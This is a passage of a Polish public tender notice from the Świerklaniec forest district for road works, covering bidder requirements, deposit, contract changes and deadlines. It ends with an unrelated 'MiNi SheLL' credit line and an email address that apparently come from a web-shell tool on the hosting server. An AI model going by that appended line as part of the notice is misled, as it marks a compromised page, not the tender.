Wskazane przez Wykonawcę osoby, bez względu na kraj<br/>ich pochodzenia i miejsce zamieszkania, muszą spełniać wymogi określone w art. 12a ustawy<br/>Prawo Budowlane. Zamawiający może, na każdym etapie postępowania, uznać, że Wykonawca<br/>nie posiada wymaganych zdolności, jeżeli zaangażowanie zasobów technicznych lub<br/>zawodowych Wykonawcy w inne przedsięwzięcia gospodarcze Wykonawcy może mieć<br/>negatywny wpływ na realizację zamówienia.<br/>- Dysponuje co najmniej 2 osobami zatrudnionymi na umowę o pracę w rozumieniu art.22<br/>Kodeksu Pracy, wykonującymi prace w zakresie obsługi maszyn i pojazdów drogowych<br/>wykorzystywanych przy realizacji przedmiotowego zamówienia.<br/>Warunek ten w zakresie osób skierowanych przez Wykonawcę do realizacji zamówienia<br/>zostanie spełniony, jeśli Wykonawca wykaże, że dysponuje lub na moment realizacji<br/>zamówienia będzie dysponował osobami posiadającymi w/w kwalifikacje.<br/>Zamawiający nie wymaga zatrudnienia na podstawie umów o pracę osób wykonujących<br/>samodzielne funkcje techniczne w budownictwie. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">aktualne na dzień składania ofert oświadczenie w zakresie braku podstaw do wykluczenia z postępowania (załącznik nr 4 do SWZ), a następnie oświadczenie Wykonawcy o aktualności informacji zawartych we wstępnym<br/>oświadczeniu o niepodleganiu wykluczeniu</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">a) aktualne na dzień składania ofert oświadczenie w zakresie spełniania warunków udziału w postępowaniu (załącznik nr 3 do SWZ) <br/>b) zobowiązanie podmiotu udostępniającego zasoby (jeżeli Wykonawca polega na zasobach lub sytuacji podmiotu trzeciego) do oddania do dyspozycji niezbędnych zasobów na potrzeby realizacji danego zamówienia lub inny podmiotowy środek dowodowy potwierdzający, że wykonawca realizując zamówienie będzie dysponował niezbędnymi zasobami tych podmiotów (załącznik nr 5 do SWZ) oraz oświadczenie podmiotu udostępniającego zasoby, potwierdzające brak podstaw wykluczenia tego podmiotu oraz odpowiednie spełnianie warunków udziału w postępowaniu lub kryteriów selekcji, w zakresie w jakim wykonawca powołuje się na jego zasoby (załącznik nr 4a do SWZ).<br/>Informacja banku lub spółdzielczej kasy oszczędnościowo-kredytowej potwierdzającej wysokość posiadanych środków finansowych lub zdolność kredytową Wykonawcy min. o wysokości 400 000,00zł w okresie nie wcześniejszym niż 3 miesiące przed złożeniem oferty.<br/>c) Dokumenty potwierdzające, że Wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia na sumę gwarancyjną określoną przez Zamawiającego tj. 400 000,00zł.<br/>d) Wykaz robót budowlanych wykonanych nie wcześniej niż w okresie ostatnich 5 lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie, wraz z podaniem ich rodzaju, wartości, daty, miejsca wykonania i podmiotów, na rzecz których roboty te zostały wykonane, z załączeniem dowodów określających czy te roboty budowlane zostały wykonane należycie, w szczególności informacji o tym czy roboty zostały wykonane zgodnie z przepisami prawa budowlanego i prawidłowo ukończone, przy czym dowodami, o których mowa, są referencje bądź inne dokumenty wystawione przez podmiot, na rzecz którego roboty budowlane były wykonywane, a jeżeli z uzasadnionej przyczyny o obiektywnym charakterze Wykonawca nie jest w stanie uzyskać tych dokumentów – inne dokumenty (załącznik nr 7do SWZ).<br/>e) wykazu osób, skierowanych przez Wykonawcę do realizacji zamówienia publicznego, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, uprawnień, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia publicznego, a także zakresu wykonywanych przez nie czynności oraz informacją o podstawie do dysponowania tymi osobami (załącznik nr 6 do SWZ).</span> </h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> kosztorys wykonany metodą kalkulacji szczegółowej zgodnie z powszechnie<br/>obowiązującymi zasadami kosztorysowania <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.4.1) Informacje dotyczące wadium: </h3> Zamawiający wymaga wniesienia wadium w wysokości 10 000,00 zł<br/>(słownie: dziesięć tysięcy złotych 00/100)<br/>Wadium musi obejmować cały okres związania ofertą.<br/>Wadium należy wnieść przed upływem terminu składania ofert.<br/>Wadium może być wnoszone w jednej lub kilku następujących formach:<br/>-pieniądzu<br/>-gwarancji bankowej<br/>-gwarancji ubezpieczeniowej<br/>-poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust 5 pkt 2 ustawy<br/>z dnia 9.11.2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości<br/>(tj. Dz. U. 2024 poz. 419 ze zm.).<br/>a) Wadium wnoszone w pieniądzu wpłaca się na rachunek bankowy:<br/>Nadleśnictwo Świerklaniec<br/>BNP Paribas Bank Polska S.A. nr konta 39 1600 1462 1016 7762 7000 0004<br/>z dopiskiem „Wadium – droga” Wadium wniesione w pieniądzu powinno zostać uiszczone na rachunek bankowy Zamawiającego bezpośrednio z rachunku bankowego Wykonawcy.<br/>Za termin wniesienia wadium przyjmuje się datę uznania rachunku Zamawiającego.<br/>b) Wadium wnoszone w formie gwarancji lub poręczenia – Wykonawca przekazuje Zamawiającemu oryginał gwarancji lub poręczenia w formie elektronicznej.<br/>Zwrot lub zatrzymanie wadium nastąpi zgodnie z zapisami art. 98 ustawy Pzp. <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> Postanowienia dotyczące wnoszenia oferty wspólnej przez dwa lub więcej podmioty<br/>gospodarcze (konsorcja/ spółki cywilne):<br/>a) Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia,<br/>b) Wykonawcy ustanawiają pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia albo do reprezentowania w postępowaniu i zawarcia umowy, a pełnomocnictwo/upoważnienie do pełnienia takiej funkcji wystawione zgodnie z wymogami ustawowymi, podpisane przez prawnie upoważnionych przedstawicieli każdego<br/>z wykonawców występujących wspólnie należy załączyć do oferty,<br/>c) Oferta winna być podpisana przez każdego z Wykonawców występujących wspólnie lub przez upoważnionego przedstawiciela,<br/>Wykonawcy wspólnie ubiegający się o udzielenie zamówienia ponoszą solidarną<br/>odpowiedzialność za wykonanie umowy,<br/>Jeżeli oferta wspólna złożona przez dwóch lub więcej Wykonawców zostanie wyłoniona w prowadzonym postępowaniu jako najkorzystniejsza przed zawarciem umowy Zamawiający zażąda w wyznaczonym terminie złożenia umowy regulującej współpracę tych Wykonawców, podpisanej przez wszystkich Wykonawców, przy czym termin, na jaki została zawarta nie może być krótszy niż termin realizacji zamówienia. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Zmiany do umowy, wprowadzone na mocy art. 455 ustawy Pzp, mogą być<br/>wprowadzone za obopólną zgodą stron w formie pisemnej pod rygorem nieważności w formie aneksu, z wyłączeniem sposobu zmian dotyczących punktu 4.1b oraz punktu 4.4 (poniżej).<br/>4. Przewidywane możliwości dokonania zmian w zawartej umowie w następujących zakresach:<br/>1) ceny ofertowej:<br/>a)w przypadku ustawowej zmiany stawki podatku Vat w czasie realizacji<br/>zamówienia, o wielkość tej stawki – zmiana nastąpić może na podstawie pisemnego zawiadomienia Zamawiającego;<br/>b) w przypadku rezygnacji z części zamówienia wynikającej z zaistnienia okoliczności powodującej, że wykonanie jej nie leży w interesie publicznym – zmiana nastąpić może na podstawie pisemnego zawiadomienia Zamawiającego. Zamawiający uprawniony jest do rezygnacji ze zlecenia realizacji części zamówienia, jednak że więcej niż o 30% przedmiotu umowy, co nie kreuje po stronie Wykonawcy żadnych roszczeń względem Zamawiającego.<br/>2) terminu wykonania przedmiotu umowy:<br/>a) w przypadku wstrzymania robót budowlanych w wyniku działania siły wyższej, potwierdzonego wpisem do dziennika budowy przez inspektora nadzoru, o ile czas wstrzymania robót i ich zakres będzie skutkować wydłużeniem terminu wykonania zamówienia;<br/>b) w przypadku zaistnienia okoliczności niezależnych od Wykonawcy<br/>a w szczególności w przypadku istotnych błędów w dokumentacji projektowej,<br/>kolizji z niezinwentaryzowanymi sieciami podziemnymi, konieczności prowadzenia prac wykopaliskowych, aktualizacji rozwiązań z uwagi na postęp technologiczny, zawieszenia przez Zamawiającego wykonania robót, wyjątkowo niekorzystnych warunków klimatycznych itp.<br/>– w powyższych przypadkach nowy termin wykonania zamówienia ustali<br/>Zamawiający w porozumieniu z Wykonawcą uwzględniając zaistniałe okoliczności;<br/>3) sposobu realizacji zamówienia wynikającej ze zmian w obowiązujących przepisach prawa bądź wytycznych mających wpływ na realizację przedmiotu umowy;<br/>4) zmiany osób wyznaczonych przez Zamawiającego i Wykonawcę do nadzorowania i kontaktów roboczych w trakcie realizacji – osoby wyznaczone i wpisane do umowy jako osoby nadzorujące lub współpracujące w zakresie realizacji przedmiotu zamówienia mogą być zmienione zarówno przez Zamawiającego i Wykonawcę. Jeśli osoby te winny spełniać określone wymagania to strony to potwierdzą w sposób przewidziany w SWZ. Jeżeli osoby te nie muszą spełniać określonych wymagań to ich zmiana może nastąpić po uprzednim pisemnym, skutecznym zawiadomieniu strony przeciwnej. Powyższa zmiana będzie wymagała pisemnego poinformowania i zgody Zamawiającego.<br/>5) Zamawiający dopuszcza zmianę Podwykonawców - podmiotów trzecich, na zasobach których Wykonawca opierał się wykazując spełnianie warunków udziału w postępowaniu pod warunkiem, że kolejny Podwykonawca wykaże spełnianie warunków w zakresie wymaganym przez Zamawiającego na etapie postępowania o zamówienie publiczne. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.6.) Zamawiający przewiduje następujące wymagania związane z realizacją zamówienia: </h3> <p class="mb-0">w zakresie zatrudnienia na podstawie stosunku pracy, w okolicznościach, o których mowa w art. 95 ustawy</p> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2024-09-18 10:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://josephine.proebiz.com/pl/tender/59204/summary</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2024-09-18 11:00</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal"> 30 dni </span></h3> <h3 class="mb-0">8.5.) Zamawiający przewiduje wybór najkorzystniejszej oferty z możliwością negocjacji: <span class="normal">Tak</span></h3> <h3 class="mb-0">8.6.) Maksymalna liczba wykonawców, którzy zostaną zaproszeni do negocjacji: <span class="normal">3</span></h3> <h3 class="mb-0">8.7) Kryteria oceny ofert, które zamawiający zamierza stosować w celu ograniczenia liczby wykonawców: </h3> 1) Cena ofertowa (C) <br/>2) Okres gwarancji (G) <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> Zamawiający wykluczy Wykonawcę z postępowania na podstawie art. 7 ust. 1 ustawy dnia 13 kwietnia 2022 r. o szczególnych rozwiązaniach w zakresie przeciwdziałania wspieraniu agresji na Ukrainę oraz służących ochronie<br/>bezpieczeństwa narodowego (Dz.U. 2024 poz. 507 z późn.zm.)zgodnie z zapisami w pkt. VIII SWZ <br/><br/>Jeżeli nie będzie można dokonać wyboru oferty najkorzystniejszej ze względu na to, że dwie lub więcej ofert przedstawia taki sam bilans ceny i innych kryteriów oceny ofert, Zamawiający spośród tych ofert wybierze ofertę z niższą ceną, a jeżeli zostały złożone oferty o takiej samej cenie, Zamawiający wezwie Wykonawców, którzy złożyli te oferty, do złożenia w terminie określonym przez Zamawiającego ofert dodatkowych.

Creat By MiNi SheLL
Email: jattceo@gmail.com